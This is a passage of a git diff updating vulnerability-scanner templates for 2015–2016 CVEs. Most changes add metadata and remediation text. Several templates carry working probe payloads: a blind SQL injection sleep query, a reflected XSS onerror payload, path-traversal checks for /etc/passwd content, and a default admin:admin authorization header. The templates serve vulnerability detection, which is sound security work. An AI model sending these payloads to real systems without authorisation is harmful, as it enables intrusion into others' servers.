vulnerability. reference: - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html - https://www.exploit-db.com/exploits/39409/ @@ -15,9 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-7245 cwe-id: CWE-22 - tags: cve,cve2015,dlink,lfi,packetstorm,edb + epss-score: 0.96881 + epss-percentile: 0.99601 + cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: d-link + product: dvg-n5402sp_firmware + tags: cve,cve2015,dlink,lfi,packetstorm,edb http: - raw: @@ -33,4 +40,4 @@ http: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/09/30 +# digest: 490a0046304402200178809dfd524513ee7dee98bd8fa30dd54ca77c646b27d86a4e46cfbe4cf52802200ad55fc293b0f23581d60333998c65c6cf0395540c3fcb2de2627f3f94378672:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index d5fa99561c..8dd4f2aa67 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -5,19 +5,27 @@ info: author: princechaddha severity: high description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands. + remediation: | + Apply the latest security patches and updates provided by Joomla! to mitigate the SQL Injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2015-7297 - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ + - http://packetstormsecurity.com/files/134097/Joomla-3.44-SQL-Injection.html + - http://packetstormsecurity.com/files/134494/Joomla-Content-History-SQL-Injection-Remote-Code-Execution.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2015-7297 cwe-id: CWE-89 - tags: cve,cve2015,joomla,sqli + epss-score: 0.97564 + epss-percentile: 0.99998 + cpe: cpe:2.3:a:joomla:joomla\!:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 - + vendor: joomla + product: joomla\! + tags: packetstorm,cve,cve2015,joomla,sqli variables: num: "999999999" @@ -28,8 +36,8 @@ http: matchers: - type: word + part: body words: - '{{md5({{num}})}}' - part: body -# Enhanced by mp on 2022/03/02 +# digest: 4a0a004730450221009d673eae8916791f24d8046edd39a8ce0db2749c76db937501735c2ab612fd0902206d7d182a8282c138730f56b10c6b640243289a34f6082fa975fd2dde03ea8f5f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index fe15e88f08..957f32e5f1 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -5,19 +5,28 @@ info: author: daffainfo severity: medium description: WordPress Pie Register before 2.0.19 contains a reflected cross-site scripting vulnerability in pie-register/pie-register.php which allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URL. + remediation: | + Update to the latest version of the WordPress Pie-Register plugin (2.0.19 or higher) to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html - https://github.com/GTSolutions/Pie-Register/blob/2.0.19/readme.txt - https://nvd.nist.gov/vuln/detail/CVE-2015-7377 - http://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html + - https://wpvulndb.com/vulnerabilities/8212 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-7377 cwe-id: CWE-79 - tags: cve2015,wordpress,wp-plugin,xss,packetstorm,cve + epss-score: 0.00239 + epss-percentile: 0.6171 + cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: genetechsolutions + product: pie_register + framework: wordpress + tags: cve2015,wordpress,wp-plugin,xss,packetstorm,cve http: - method: GET @@ -27,9 +36,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 490a00463044022079c6577e09ec4fa4327432fff92696b39d6f2939051f60cc84d17b16cdb930bd0220360f05da542655c9c43113a501e41538302bd22d77d95e424c2e7cf3f9ff44fc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 6476c78b02..658484d318 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -5,18 +5,26 @@ info: author: wdahlenb severity: critical description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default). + remediation: | + Apply the latest security patches provided by IBM to mitigate this vulnerability. reference: - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - http://www-01.ibm.com/support/docview.wss?uid=swg21972799 + - http://www-01.ibm.com/support/docview.wss?uid=swg21970575 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2015-7450 cwe-id: CWE-94 + epss-score: 0.9739 + epss-percentile: 0.99888 + cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ibm + product: tivoli_common_reporting shodan-query: http.html:"IBM WebSphere Portal" tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java,kev @@ -44,10 +52,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 500 - - type: word words: - 'SOAP-ENV:Server' @@ -55,8 +59,12 @@ http: condition: and - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" -# Enhanced by mp on 2022/05/10 + - type: status + status: + - 500 + +# digest: 4a0a0047304502200658e80a19f9b1408cecdefee909c4c36ecc66cafcc3f590cde4f10101a9b7120221008d68ccae253ef28b9f0f86d4801bd45e51f81668e8cc234ff7d70a8a8e653b0e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 60054ee2ee..6561eae441 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion. + remediation: | + Upgrade to a version of ManageEngine Firewall Analyzer that is equal to or greater than 8.0 to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/35933 - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html @@ -15,9 +17,14 @@ info: cvss-score: 6.5 cve-id: CVE-2015-7780 cwe-id: CWE-22 - tags: manageengine,edb,cve,cve2015,lfi + epss-score: 0.00151 + epss-percentile: 0.51131 + cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zohocorp + product: manageengine_firewall_analyzer + tags: manageengine,edb,cve,cve2015,lfi http: - method: GET @@ -26,15 +33,11 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word + part: body words: - "" - "java.sun.com" - part: body condition: and - type: word @@ -42,4 +45,8 @@ http: words: - "application/xml" -# Enhanced by mp on 2022/07/22 + - type: status + status: + - 200 + +# digest: 490a0046304402205295d545f00dab70a62571afe614c9fe68a5e5b939e6ba9edbfc33515c78b49a022074d9d9aba2a1022aa1f9c9964f7a527da2e916b26908c578e7cea4c87866f3a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 0a3c19b2c7..9f733ac2bc 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -3,20 +3,27 @@ id: CVE-2015-7823 info: name: Kentico CMS 8.2 - Open Redirect author: 0x_Akoko - severity: low + severity: medium description: Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. + remediation: | + Apply the latest security patches or upgrade to a newer version of Kentico CMS. reference: - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html - https://nvd.nist.gov/vuln/detail/CVE-2015-7823 - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-score: 5.8 cve-id: CVE-2015-7823 cwe-id: NVD-CWE-Other - cvss-score: 5.8 - tags: cve,cve2015,kentico,redirect,packetstorm + epss-score: 0.00233 + epss-percentile: 0.61182 + cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kentico + product: kentico_cms + tags: cve,cve2015,kentico,redirect,packetstorm http: - method: GET @@ -25,8 +32,8 @@ http: matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - part: header -# Enhanced by mp on 2022/09/30 +# digest: 490a00463044022073b36097bb2afe6cef3c65a36542300478481af5927f00642029c7aaa4501eb4022043838c890f049f8f61dae0508735306e488c5d5daf09faf1bc30fd8a90b8d7ca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index a3492b17ef..12c3063d27 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -5,18 +5,24 @@ info: author: pikpikcu severity: medium description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. + remediation: | + Upgrade to a version of SourceBans that is 2.0 or above, which includes a fix for this vulnerability. reference: - https://www.htbridge.com/advisory/HTB23273 - - http://web.archive.org/web/20201207072921/https://www.securityfocus.com/archive/1/537018/100/0/threaded - https://nvd.nist.gov/vuln/detail/CVE-2015-8349 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2015-8349 cwe-id: CWE-79 - tags: cve,cve2015,xss,sourcebans + epss-score: 0.0013 + epss-percentile: 0.47577 + cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gameconnect + product: sourcebans + tags: cve,cve2015,xss,sourcebans http: - method: GET @@ -26,17 +32,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/ -# Enhanced by mp on 2022/08/12 + - type: status + status: + - 200 + +# digest: 490a00463044022026b43dc3e3a1bcb5e824bd69d5dfbb2300fff27e36bde14e86a3add74926331a02202bde7fea1d47f7fa4207b0534292172e6f50dacb91773bfc37154d4b537d89b2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index 0bf640b97f..957aaa2619 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -5,18 +5,24 @@ info: author: princechaddha severity: medium description: Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. + remediation: | + Upgrade to a version higher than 5.8.17 to mitigate the vulnerability. reference: - https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro - https://www.exploit-db.com/exploits/39170/ - - http://web.archive.org/web/20201209041130/https://www.securityfocus.com/archive/1/537232/100/0/threaded - https://nvd.nist.gov/vuln/detail/CVE-2015-8399 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2015-8399 cwe-id: CWE-200 + epss-score: 0.9647 + epss-percentile: 0.99433 + cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: atlassian + product: confluence shodan-query: http.component:"Atlassian Confluence" tags: edb,cve,cve2015,atlassian,confluence @@ -27,10 +33,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -38,4 +40,8 @@ http: - "View Default Decorator" condition: and -# Enhanced by mp on 2022/09/30 + - type: status + status: + - 200 + +# digest: 490a0046304402202e9653e2b4961c1e938d28570d14981d1c46a24657e19e12d73c239573d2a45a022027a85167359445c3455967dbf1755cd4a6c6dc4920669666be7d3b18871578d2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index 72e566cf29..4db954e2ce 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -5,19 +5,27 @@ info: author: emadshanab severity: high description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index. + remediation: | + Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates. reference: - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce - http://www.openwall.com/lists/oss-security/2016/02/18/8 + - http://issues.umbraco.org/issue/U4-7457 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N cvss-score: 8.2 cve-id: CVE-2015-8813 cwe-id: CWE-918 - tags: cve,cve2015,ssrf,oast,umbraco + epss-score: 0.00511 + epss-percentile: 0.73952 + cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: umbraco + product: umbraco + tags: cve,cve2015,ssrf,oast,umbraco http: - method: GET @@ -26,8 +34,8 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# Enhanced by mp on 2022/06/08 +# digest: 490a0046304402203b422e675cce7cc4cb6ab48bf3a394e201e044ea04e59aafecf89c4c4d695a0402207d6317fe01a8d17e5c79559ee0e3deaf33164d8275cffb86dd51ae82435c7869:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index cb2b65651e..1072040d1f 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -6,20 +6,26 @@ info: severity: medium description: | WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file "includes/nsp_search.php", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack. + remediation: Fixed in version 1.0.6 reference: - https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054 - https://g0blin.co.uk/g0blin-00057/ - https://wordpress.org/plugins/newstatpress/#developers - https://nvd.nist.gov/vuln/detail/CVE-2015-9312 - remediation: Fixed in version 1.0.6 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2015-9312 cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: newstatpress_project + product: newstatpress + framework: wordpress tags: cve2015,xss,authenticated,wp,newstatpress,wpscan,cve,wordpress,wp-plugin http: @@ -30,7 +36,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1 Host: {{Hostname}} @@ -44,4 +49,4 @@ http: - 'contains(body_2, "newstatpress")' condition: and -# Enhanced by md on 2023/03/15 +# digest: 4b0a00483046022100f95695f608169047164e156166d883c1e408aba857eba08a6305c81c53fa97c902210095a36b522f5eecd1ea8410cb9d2743248dd93a4bd891a4fce5fb415e786a7e6a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml new file mode 100644 index 0000000000..28483940f1 --- /dev/null +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -0,0 +1,53 @@ +id: CVE-2015-9323 + +info: + name: 404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection + author: Harsh + severity: critical + description: | + The 404 to 301 – Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability. + remediation: Fixed in version 2.0.3 + reference: + - https://wpscan.com/vulnerability/61586816-dd2b-461d-975f-1989502affd9 + - http://cinu.pl/research/wp-plugins/mail_e28f19a8f03f0517f94cb9fea15d8525.html + - https://wordpress.org/plugins/404-to-301/#developers + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2015-9323 + cwe-id: CWE-89 + epss-score: 0.00779 + epss-percentile: 0.79408 + cpe: cpe:2.3:a:duckdev:404_to_301:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + vendor: duckdev + product: 404_to_301 + framework: wordpress + tags: cve,cve2015,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + @timeout: 15s + GET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration>=5' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "404-to-301")' + condition: and + +# digest: 490a0046304402202dec7554e4ba3c048efd814feb0610687c1654779c43e30b7540706bbadfb80802203b51f4f8184b3b71a2eaffc04a050b5bf90e2ab1fdf552bc812f8fd48491c893:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index de7b039f46..d357f381c5 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress Symposium plugin (>=15.8.2) which includes a fix for this vulnerability. reference: - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095 - https://wpvulndb.com/vulnerabilities/8175 @@ -15,10 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2015-9414 cwe-id: CWE-79 - cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:*:*:* epss-score: 0.00111 + epss-percentile: 0.44112 + cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: wpsymposiumpro + product: wp-symposium + framework: wordpress google-query: inurl:"/wp-content/plugins/wp-symposium" tags: xss,wpscan,cve,cve2015,wordpress,wp-plugin @@ -30,9 +36,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header @@ -43,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4b0a00483046022100d36d78ea556aa2431c509a634f97cc69c561d2925665f2424cf7d46a4e94277b022100c6c5fbdf433038624cc8f6b128c62360689932ec6ce51f550f95cfb97e78b35f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index ff69399631..8a25b3dd32 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter. + remediation: | + Update to the latest version of the WordPress RobotCPA 5 plugin to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/37252 - https://nvd.nist.gov/vuln/detail/CVE-2015-9480 @@ -13,10 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-9480 cwe-id: CWE-22 - cpe: cpe:2.3:a:robot-cpa:robotcpa:*:*:*:*:*:*:*:* - epss-score: 0.14215 + epss-score: 0.29071 + epss-percentile: 0.9635 + cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: robot-cpa + product: robotcpa + framework: wordpress google-query: inurl:"/wp-content/plugins/robotcpa" tags: wp-plugin,lfi,edb,cve,cve2015,wordpress @@ -28,11 +34,12 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body + - type: status status: - 200 -# Enhanced by mp on 2022/04/20 +# digest: 490a0046304402201ba225c823c26be8e5b0c037f971befa9a69a3ebfbe114e0478270a5cf06d3d9022064f6ef67df722dbaebe9478e6e6e9c1453af9acbf7d1bd819630506e4588295c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 695f55f596..4e34855759 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. + remediation: | + Upgrade to Adobe AEM Dispatcher version 4.15 or higher to fix the vulnerability. reference: - https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html - https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html @@ -13,8 +15,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-0957 + epss-score: 0.06304 + epss-percentile: 0.92822 + cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: adobe + product: dispatcher shodan-query: http.component:"Adobe Experience Manager" tags: cve,cve2016,adobe,aem @@ -22,14 +29,12 @@ http: - method: GET path: - "{{BaseURL}}/system/console?.css" + headers: Authorization: "Basic YWRtaW46YWRtaW4K" matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - "Adobe" @@ -37,4 +42,8 @@ http: - "(Runtime)" condition: and -# Enhanced by mp on 2022/06/08 + - type: status + status: + - 200 + +# digest: 4b0a004830460221008be469b954725ef0dd9e60aa86dd5a848d277574528a0726aae64b83ac350883022100f1db3f002c0fa35404a63af14e3cfc8f1296a6485d34a1ee3518543f1ad02386:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index fbd1f158a1..8fe51a53b0 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -5,18 +5,25 @@ info: author: daffainfo severity: medium description: WordPress Admin Font Editor 1.8 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=526 - https://wordpress.org/plugins/admin-font-editor - - http://web.archive.org/web/20210123183728/https://www.securityfocus.com/bid/93896/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000126 cwe-id: CWE-79 + epss-score: 0.00119 + epss-percentile: 0.45693 + cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: admin-font-editor_project + product: admin-font-editor + framework: wordpress google-query: inurl:"/wp-content/plugins/admin-font-editor" tags: cve,cve2016,wordpress,xss,wp-plugin @@ -28,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4a0a00473045022100e878e8017b0989265ec20fb7285f2ca94c2b1a5e585a9287caaaa21d06832023022047a5ce487ca76aad619fd19ce4d9477c8e00da38fbf600e1861cf94481e780c3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index f95d95c063..b36ec959c7 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -5,19 +5,26 @@ info: author: daffainfo severity: medium description: WordPress AJAX Random Post 2.00 is vulnerable to reflected cross-site scripting. + remediation: | + Update to the latest version of the WordPress AJAX Random Post plugin (2.00 or higher) to fix this issue. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=494 - https://wordpress.org/plugins/ajax-random-post - - http://web.archive.org/web/20210614214105/https://www.securityfocus.com/bid/93895 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000127 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00119 + epss-percentile: 0.45693 + cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: ajax-random-post_project + product: ajax-random-post + framework: wordpress + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/05 +# digest: 4b0a00483046022100bdabf3d52cf0c55c3e7caf39eeed8721e9f914e97819090385a9275de280e1b6022100c085a9c1a450253564b6355b95d8946fb8b1d7b131bc97d5afaa4d4dab612a96:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index 24a80430a4..39bda78902 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress anti-plagiarism 3.6.0 and prior are vulnerable to reflected cross-site scripting. + remediation: | + Update the WordPress anti-plagiarism plugin to version >3.60 or apply the latest security patches provided by the vendor. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - https://wordpress.org/plugins/anti-plagiarism @@ -14,8 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000128 cwe-id: CWE-79 + epss-score: 0.00142 + epss-percentile: 0.49783 + cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: anti-plagiarism_project + product: anti-plagiarism + framework: wordpress google-query: inurl:"/wp-content/plugins/anti-plagiarism" tags: cve,cve2016,wordpress,xss,wp-plugin @@ -27,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/05 +# digest: 4a0a004730450220201936a3dbfeb0ba028477677a61385fb99e5e4f8baeda833a5d2d2f6b406c2f022100c9f52292809fd64aaa20ae16778559cb2c24dcce532fab5c42e8a4b316789ba8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml index 443cae3e74..73ce2c3598 100644 --- a/http/cves/2016/CVE-2016-1000129.yaml +++ b/http/cves/2016/CVE-2016-1000129.yaml @@ -5,18 +5,25 @@ info: author: daffainfo severity: medium description: WordPress defa-online-image-protector 3.3 and before contains a reflected 